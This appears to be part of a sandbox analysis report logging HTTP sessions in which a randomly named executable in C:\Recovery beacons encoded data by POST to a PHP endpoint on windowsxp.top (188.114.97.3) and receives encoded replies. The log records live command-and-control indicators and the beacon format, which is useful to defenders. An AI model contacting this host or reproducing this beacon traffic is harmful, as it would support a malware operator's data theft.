                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:50.190643072 CET1012OUTData Raw: 55 50 58 55 5b 58 56 52 54 58 57 54 54 52 5b 5a 59 51 5b 59 52 50 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPXU[XVRTXWTTR[ZYQ[YRPRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y'>/5:68\.B0^%+;;,>?<P"2?^,[+_>/>-?!Y##X(
                                                                                                                  Oct 27, 2024 19:22:50.426687956 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.449754188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:50.788919926 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:51.133835077 CET1012OUTData Raw: 55 56 58 58 5b 5b 56 52 54 58 57 54 54 50 5b 5d 59 58 5b 5a 52 53 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVXX[[VRTXWTTP[]YX[ZRSRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$2>!:9]56,:3'($Q/-<V=<$"!'Z-=^>,5,/!Y##X(7
                                                                                                                  Oct 27, 2024 19:22:51.405128002 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.449755188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:50.923379898 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:51.274605989 CET1716OUTData Raw: 50 56 58 5a 5e 53 56 5e 54 58 57 54 54 5c 5b 5e 59 5f 5b 5c 52 5f 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVXZ^SV^TXWTT\[^Y_[\R_RYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1_"\66-3'8 ;<><8Q7"<,['^?<..!Y##X(
                                                                                                                  Oct 27, 2024 19:22:51.519530058 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.449757188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:51.721949100 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:52.072951078 CET1008OUTData Raw: 55 50 5d 5b 5b 5c 56 50 54 58 57 54 54 55 5b 5f 59 5d 5b 51 52 50 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UP][[\VPTXWTTU[_Y][QRPR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$2. *%]#68-4'+(Q/-8><""3X,-+=<&.!Y##X(7
                                                                                                                  Oct 27, 2024 19:22:52.346030951 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:52.558535099 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:52.666775942 CET781INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HdMWpEI2Ku0JWCAx2lYQhbp8DAnNDv4eAn6Ukcl0Fbxuu90f4QvlaWCWmM4b%2BMxxepk%2BlLx8%2F%2BVoQvcW%2BYBiGLt23lwPSSiPIyttsZlL6%2BZO%2FJnW6%2F6haoZIT5h9ooSt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6c8cefc0c0b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2078&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1353&delivery_rate=677268&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.449758188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:52.932419062 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:53.289885044 CET1012OUTData Raw: 50 52 5d 5b 5e 5a 53 57 54 58 57 54 54 54 5b 5b 59 5d 5b 5f 52 51 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PR][^ZSWTXWTTT[[Y][_RQRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']2-/5*!64]:$'(;)< V#?-.;^*)-!Y##X('


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.449759188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:53.446664095 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.449760188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:53.949356079 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:54.305499077 CET1012OUTData Raw: 55 51 58 5c 5b 59 56 52 54 58 57 54 54 57 5b 5f 59 5d 5b 59 52 50 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UQX\[YVRTXWTTW[_Y][YRPRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']&^!)658^.B4_'(;--;=/7 2Y8-$)<=-/!Y##X(+
                                                                                                                  Oct 27, 2024 19:22:54.542237043 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:54.857613087 CET767INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rf99ub9fvT8SQbUdaq%2FugyLdcoox1VAPNZhqbZbxiyMCUVWTFrrTR6%2B6iK3KLecJiiGgjxeBBCB8FBiALctnmDT7%2FCQiko5WWsdRrWd6ftbA3xwrbPLHNdKl9mb51CjJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6d68dd63acd-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1102&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1318761&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:22:54.857682943 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.449761188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:54.983453989 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:55.336704016 CET1012OUTData Raw: 55 52 5d 59 5e 52 53 57 54 58 57 54 54 54 5b 5d 59 5d 5b 58 52 53 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UR]Y^RSWTXWTTT[]Y][XRSRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$2+6X6[.$7388,=;=<8T Y8.'X>/*X,/!Y##X('
                                                                                                                  Oct 27, 2024 19:22:55.579770088 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:55.891129017 CET776INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oke9c8LTJIBlzH%2BvXC7xi2BTbTiFDf%2FT%2BQLUzxRt7N7yH%2FzDdbmAYCIAkm2QrA%2B1bg2fzxMtBpP0dU2K9iq6PgkdZp9FkuobIsnlkmJSMQSBwmN8sxQ0uDL5ugz92nvR"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6dcfd0b45f6-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1286&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1143759&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.449762188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:56.017615080 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:56.368505955 CET1012OUTData Raw: 50 56 58 59 5e 52 56 51 54 58 57 54 54 5d 5b 52 59 58 5b 50 52 56 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVXY^RVQTXWTT][RYX[PRVRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1X 6:2"/-$#3;<P/X4V*<7 ,;;[?<:!Y##X(
                                                                                                                  Oct 27, 2024 19:22:56.647799015 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:56.866482973 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:56.975310087 CET777INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ueyPiU%2BIvKdC2lFuR2uLSMvG6FoTFYQ8scmRItGKGUL6%2FjDWX3XBiB667x0%2FokeG9g1zzrehaP1ZMOTG2D1ZUBdQP8aM%2Fxj%2BQF0hXGboHM%2Fca3HDzIHvQdlt92z0iAG"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6e3aebc2e1f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1827&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=815315&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  16192.168.2.449763188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:56.594444036 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:56.946412086 CET1716OUTData Raw: 50 55 58 5e 5e 53 53 54 54 58 57 54 54 5c 5b 5f 59 5f 5b 51 52 50 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUX^^SSTTXWTT\[_Y_[QRPRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$2.,Y")*"8.7%;#,*'#8/X=,=.!Y##X(
                                                                                                                  Oct 27, 2024 19:22:57.197110891 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:57.507241011 CET924INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CxkmJB5eV%2By%2BoFggwff1pF7Zo9DuPzzPzkFNJrC9AISSBHdndcwbrkbWgJMsxDtGgj0qRIT%2FdrvqACs7%2Bf15Oo8rKoQ53HLOFj75IJtw7SlP8hsv13zPt1IH9ZFNYmI%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6e71cd2b78d-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1075&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1401742&cwnd=67&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 21 00 23 58 34 52 3d 2f 3e 0d 2a 22 31 13 27 3c 39 5b 38 0c 02 58 3e 03 18 0d 3a 38 21 0f 24 1a 0b 44 3f 00 38 59 37 00 34 56 2a 1f 21 5e 00 1c 24 05 36 3e 2d 53 25 3b 02 19 27 20 02 5f 22 2e 2b 15 3d 00 00 0c 3f 00 20 12 3c 16 06 0d 3b 59 39 54 25 17 31 00 3b 38 25 07 3f 00 2a 54 0c 14 21 1f 3a 06 2b 01 22 1f 3d 56 3d 21 20 11 24 2e 20 51 33 3a 34 56 28 3f 3f 58 2b 03 13 5d 21 12 0e 59 28 28 2e 16 30 3e 23 1e 29 04 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!#X4R=/>*"1'<9[8X>:8!$D?8Y74V*!^$6>-S%;' _".+=? <;Y9T%1;8%?*T!:+"=V=! $. Q3:4V(??X+]!Y((.0>#)"T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  17192.168.2.449764188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:57.106857061 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:57.462683916 CET1012OUTData Raw: 55 57 58 58 5b 5c 56 54 54 58 57 54 54 51 5b 5e 59 58 5b 58 52 57 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UWXX[\VTTXWTTQ[^YX[XRWRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y2(^5*5!4\.3V->/> V7(;[8>/=,/!Y##X(3
                                                                                                                  Oct 27, 2024 19:22:57.713009119 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:58.031605959 CET778INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f%2Fk7jlHcIBN7U7y3EJ3z1X5%2FK2pU9%2FXrtbTcLeThq1gBgi8mgOFr9NFzwuwb4Xy6wb%2FQ1ZOvgZeW9%2BQ8GhREY%2BA2OPnxxGFnxW1Fmu5RGSeQaGQFlvj8Dx13zX0Ih4Ud"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6ea59ad485e-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1143&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1283687&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  18192.168.2.449765188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:58.217063904 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:58.571202993 CET1008OUTData Raw: 55 52 5d 59 5e 5f 56 50 54 58 57 54 54 55 5b 5f 59 5d 5b 51 52 56 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UR]Y^_VPTXWTTU[_Y][QRVR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'[%>3!&"6+94(_'(-> V(?7$8=Y)>.!Y##X(7
                                                                                                                  Oct 27, 2024 19:22:58.819880962 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:59.142858028 CET772INHTTP/1.1 200 OK
